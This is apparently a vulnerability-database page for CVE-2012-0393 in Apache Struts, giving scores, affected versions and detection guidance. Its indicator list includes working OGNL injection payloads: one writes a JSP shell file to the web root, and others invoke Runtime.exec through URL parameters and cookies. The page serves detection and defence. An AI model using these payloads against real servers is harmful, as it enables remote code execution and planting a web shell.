cbcvebase.
CVE-2012-0393
published 2012-01-08

CVE-2012-0393: The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or…

PriorityP258medium6.4CVSS 2.0
AVNACLAuNCNIPAP
EXPLOIT
EPSS
38.26%
98.4th percentile
The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.

Affected

1 ranges
VendorProductVersion rangeFixed in
apachestruts>= 2.1.0 < 2.3.1.12.3.1.1

Detection & IOCsextracted from sources · hover to see the quote

url/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
url/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
url/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
cookie(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
pathC:/wwwroot/sec-consult.jsp
  • Detect OGNL injection attempts in HTTP parameter names or values containing '#_memberAccess["allowStaticMethodAccess"]' — a key bypass string used to enable static method access in XWork's SecurityMemberAccess.
  • Detect HTTP requests to Struts action URLs containing 'debug=command&expression=' in the query string, which invokes the DebuggingInterceptor to evaluate arbitrary OGNL expressions.
  • Detect Cookie headers containing OGNL expressions with '\u003d' (unicode-escaped '=') combined with '@java.lang.Runtime@getRuntime().exec', indicating exploitation via the CookieInterceptor.
  • Detect parameter names or values containing 'new+java.io.FileWriter' or 'new+java.io.BufferedWriter' in HTTP requests to Struts action endpoints, indicating arbitrary file write exploitation via ParameterInterceptor.
  • ·The bypass requires that the application is running in developer mode OR that the CookieInterceptor/ParametersInterceptor is not restricted to the hardened acceptedParamNames pattern. Exploitation via the Cookie vector (vuln 2) and DebuggingInterceptor (vuln 3) requires developer mode to be enabled.

CVSS provenance

nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:N/I:P/A:P
vendor_redhat6.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.